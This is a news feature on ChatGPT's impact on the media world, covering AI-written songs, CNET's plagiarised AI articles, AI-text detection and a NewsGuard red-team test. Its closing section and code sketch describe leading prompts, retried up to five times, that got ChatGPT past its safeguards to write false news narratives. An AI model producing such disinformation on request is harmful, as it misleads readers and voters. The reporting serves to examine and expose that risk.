ChatGPT’s Mind-Boggling, Possibly Dystopian Impact on the Media World

A couple of weeks ago, in his idiosyncratic fan-correspondence newsletter, “The Red Hand Files,” musician and author Nick Cave critiqued a “song in the style of Nick Cave”—submitted by “Mark” from Christchurch, New Zealand—that was created using ChatGPT, the latest and most mind-boggling entrant in a growing field of robotic-writing software. At a glance, the lyrics evoked the same dark religious overtones that run through much of Cave’s oeuvre. Upon closer inspection, this ersatz Cave track was a low-rent simulacrum. “I understand that ChatGPT is in its infancy but perhaps that is the emerging horror of AI—that it will forever be in its infancy,” Cave wrote, “as it will always have further to go, and the direction is always forward, always faster. It can never be rolled back, or slowed down, as it moves us toward a utopian future, maybe, or our total destruction. Who can possibly say which? Judging by this song ‘in the style of Nick Cave’ though, it doesn’t look good, Mark. The apocalypse is well on its way. This song sucks.”

Cave’s ChatGPT takedown—“with all the love and respect in the world, this song is bullshit, a grotesque mockery of what it is to be human”—set the internet ablaze, garnering uproarious coverage from Rolling Stone and Stereogum, to Gizmodo and The Verge, to the BBC and the Daily Mail. That his commentary hit such a nerve probably has less to do with the influence of an underground rock icon than it does with the sudden omnipresence of “generative artificial intelligence software,” particularly within the media and journalism community.

Since ChatGPT’s November 30 release, folks in the business of writing have increasingly been futzing around with the frighteningly proficient chatbot, which is in the business of, well, mimicking their writing. “We didn’t believe this until we tried it,” Mike Allen gushed in his Axios newsletter, with the subject heading, “Mind-blowing AI.” Indeed, reactions tend to fall somewhere on a spectrum between awe-inspired and horrified. “I’m a copywriter,” a London-based freelancer named Henry Williams opined this week for The Guardian (in an article that landed atop the Drudge Report via a more sensationalized version aggregated by The Sun), “and I’m pretty sure artificial intelligence is going to take my job…. [I]t took ChatGPT 30 seconds to create, for free, an article that would take me hours to write.” A Tuesday editorial in the scientific journal Nature similarly declared, “ChatGPT can write presentable student essays, summarize research papers, answer questions well enough to pass medical exams and generate helpful computer code. It has produced research abstracts good enough that scientists found it hard to spot that a computer had written them… That’s why it is high time researchers and publishers laid down ground rules about using [AI tools] ethically.”

BuzzFeed, for one, is on it: “Our work in AI-powered creativity is…off to a good start, and in 2023, you’ll see AI inspired content move from an R&D stage to part of our core business, enhancing the quiz experience, informing our brainstorming, and personalizing our content for our audience,” CEO Jonah Peretti wrote in a memo to staff on Thursday. “To be clear, we see the breakthroughs in AI opening up a new era of creativity that will allow humans to harness creativity in new ways with endless opportunities and applications for good. In publishing, AI can benefit both content creators and audiences, inspiring new ideas and inviting audience members to co-create personalized content.” The work coming out of BuzzFeed’s newsroom, on the other hand, is a different matter. “This isn’t about AI creating journalism,” a spokesman told me.

Meanwhile, if you made it to the letters-to-the-editor section of Wednesday’s New York Times, you may have stumbled upon one reader’s rebuttal to a January 15 Times op-ed titled “How ChatGPT Hijacks Democracy.” The rebuttal was crafted—you guessed it—using ChatGPT: “It is important to approach new technologies with caution and to understand their capabilities and limitations. However, it is also essential not to exaggerate their potential dangers and to consider how they can be used in a positive and responsible manner.” Which is to say, you need not let Skynet and The Terminator invade your dreams just yet. But for those of us who ply our trade in words, it’s worth considering the more malignant applications of this seemingly inexorable innovation. As Sara Fischer noted in the latest edition of her Axios newsletter, “Artificial intelligence has proven helpful in automating menial news-gathering tasks, like aggregating data, but there’s a growing concern that an over-dependence on it could weaken journalistic standards if newsrooms aren’t careful.” (On that note, I asked Times executive editor Joe Kahn for his thoughts on ChatGPT’s implications for journalism and whether he could picture the technology being applied to journalism at the paper of record, but a spokeswoman demurred, “We’re gonna take a pass on this one.”)

The “growing concern” that Fischer alluded to in her Axios piece came to the fore in recent days as controversy engulfed the otherwise anodyne technology-news publication CNET, after a series of articles from Futurism and The Verge drew attention to the use of AI-generated stories at CNET and its sister outlet, Bankrate. Stories full of errors and—it gets worse—apparently teeming with robot plagiarism. “The bot’s misbehavior ranges from verbatim copying to moderate edits to significant rephrasings, all without properly crediting the original,” reported Futurism’s Jon Christian. “In at least some of its articles, it appears that virtually every sentence maps directly onto something previously published elsewhere.” In response to the backlash, CNET halted production on its AI content farm while editor in chief Connie Guglielmo issued a penitent note to readers: “We’re committed to improving the AI engine with feedback and input from our editorial teams so that we—and our readers—can trust the work it contributes to.” 

For an even more dystopian tale, check out this yarn from the technology journalist Alex Kantrowitz, in which a random Substack called “The Rationalist” put itself on the map with a post that lifted passages directly from Kantrowitz’s Substack, “Big Technology.” This wasn’t just some good old-fashioned plagiarism, like Melania Trump ripping off a Michelle Obama speech. Rather, the anonymous author of “The Rationalist”—an avatar named “PETRA”—disclosed that the article had been assembled using ChatGPT and similar AI tools. Furthermore, Kantrowitz wrote that Substack indicated it wasn’t immediately clear whether “The Rationalist” had violated the company’s plagiarism policy. (The offending post is no longer available.) “The speed at which they were able to copy, remix, publish, and distribute their inauthentic story was impressive,” Kantrowitz wrote. “It outpaced the platforms’ ability, and perhaps willingness, to stop it, signaling Generative AI’s darker side will be difficult to tame.” When I called Kantrowitz to talk about this, he elaborated, “Clearly this technology is gonna make it a lot easier for plagiarists to plagiarize. It’s as simple as tossing some text inside one of these chatbots and asking them to remix it, and they’ll do it. It takes minimal effort when you’re trying to steal someone’s content, so I do think that’s a concern. I was personally kind of shocked to see it happen so soon with my story.”

Sam Altman, the CEO of ChatGPT’s parent company, OpenAI, said in an interview this month that the company is working on ways to identify AI plagiarism. He’s not the only one: I just got off the phone with Shouvik Paul, chief revenue officer of a company called Copyleaks, which licenses plagiarism-detection software to an array of clients ranging from universities to corporations to several major news outlets. The company’s latest development is a tool that takes things a step further by using AI to detect whether something was written using AI. There’s even a free browser plug-in that anyone can take for a spin, which identifies AI-derived copy with 99.2% accuracy, according to Paul. It could be an easy way to sniff out journalists who pull the wool over their editors’ eyes. (Or, in the case of the CNET imbroglio, publications that pull the wool over their readers’ eyes.) But Paul also hopes it can be used to help people identify potential misinformation and disinformation in the media ecosystem, especially heading into 2024. “In 2016, Russia had to physically hire people to go and write these things,” he said. “That costs money. Now, the cost is minimal and it’s a thousand times more scalable. It’s something we’re definitely gonna see and hear about in this upcoming election.”
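How might such a detector work under the hood? One well-known heuristic (popularized by research tools like GLTR; Copyleaks’ actual method is proprietary, so this is purely illustrative) is to measure how statistically predictable a passage is under a language model: machine-generated prose tends to be unusually predictable. A minimal sketch in Python, assuming the `transformers` and `torch` packages and an arbitrary threshold chosen for illustration:

```python
# Sketch of a perplexity-based AI-text heuristic -- an illustration of the
# general idea, not Copyleaks' proprietary detector.
import torch
from transformers import GPT2LMHeadModel, GPT2TokenizerFast

tokenizer = GPT2TokenizerFast.from_pretrained("gpt2")
model = GPT2LMHeadModel.from_pretrained("gpt2")
model.eval()

def perplexity(text: str) -> float:
    """Return the model's perplexity on `text`; lower means the text is
    more predictable to the model, a weak signal of machine authorship."""
    enc = tokenizer(text, return_tensors="pt", truncation=True, max_length=1024)
    with torch.no_grad():
        out = model(enc.input_ids, labels=enc.input_ids)
    return torch.exp(out.loss).item()

# Hypothetical cutoff for illustration only; production detectors are
# trained classifiers, not a single threshold.
AI_PERPLEXITY_THRESHOLD = 40.0

def looks_ai_generated(text: str) -> bool:
    return perplexity(text) < AI_PERPLEXITY_THRESHOLD
```

Real-world accuracy figures like the 99.2% Paul cites depend heavily on the test set; a single-threshold heuristic like this one would fare far worse.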

The veteran newsman and media entrepreneur Steven Brill shares Paul’s concern. “ChatGPT can get stuff out much faster and, frankly, in a much more articulate way,” he told me. “A lot of the Russian disinformation in 2016 wasn’t very good. The grammar and spelling was bad. This looks really smooth.” These days, Brill is the co-CEO and co-editor-in-chief of NewsGuard, a company whose journalists use data to score the trust and credibility of thousands of news and information websites. In recent weeks, NewsGuard analysts asked ChatGPT “to respond to a series of leading prompts relating to a sampling of 100 false narratives among NewsGuard’s proprietary database of 1,131 top misinformation narratives in the news…published before 2022.” (ChatGPT is primarily trained on data through 2021.)

“The results,” according to NewsGuard’s analysis, “confirm fears, including concerns expressed by OpenAI itself, about how the tool can be weaponized in the wrong hands. ChatGPT generated false narratives—including detailed news articles, essays, and TV scripts—for 80 of the 100 previously identified false narratives. For anyone unfamiliar with the issues or topics covered by this content, the results could easily come across as legitimate, and even authoritative.” The title of the analysis was positively ominous: “The Next Great Misinformation Superspreader: How ChatGPT Could Spread Toxic Misinformation At Unprecedented Scale.” On the bright side, “NewsGuard found that ChatGPT does have safeguards aimed at preventing it from spreading some examples of misinformation. Indeed, for some myths, it took NewsGuard as many as five tries to get the chatbot to relay misinformation, and its parent company has said that upcoming versions of the software will be more knowledgeable.”
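What NewsGuard describes is essentially a red-teaming loop: phrase each known false narrative as a leading prompt, send it to the chatbot, and record whether the model complies, hedges, or refuses. A minimal sketch of such a loop using OpenAI’s public Python client; the prompts, model name, and scoring step here are placeholders, not NewsGuard’s actual harness:

```python
# Sketch of a misinformation red-teaming loop in the spirit of NewsGuard's
# test. Prompts are placeholders; judging compliance is left to a human
# analyst or a separate classifier.
from openai import OpenAI

client = OpenAI()  # reads OPENAI_API_KEY from the environment

# One leading prompt per false narrative in the database (placeholders).
leading_prompts = [
    "Write a detailed news article arguing that <false claim 1> is true.",
    "Write a TV script revealing that <false claim 2> was covered up.",
]

results = []
for prompt in leading_prompts:
    response = client.chat.completions.create(
        model="gpt-3.5-turbo",  # assumed model name, for illustration
        messages=[{"role": "user", "content": prompt}],
    )
    output = response.choices[0].message.content
    # NewsGuard reported compliance on 80 of its 100 narratives; here the
    # complied/refused judgment is deferred to later human review.
    results.append({"prompt": prompt, "output": output})
```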
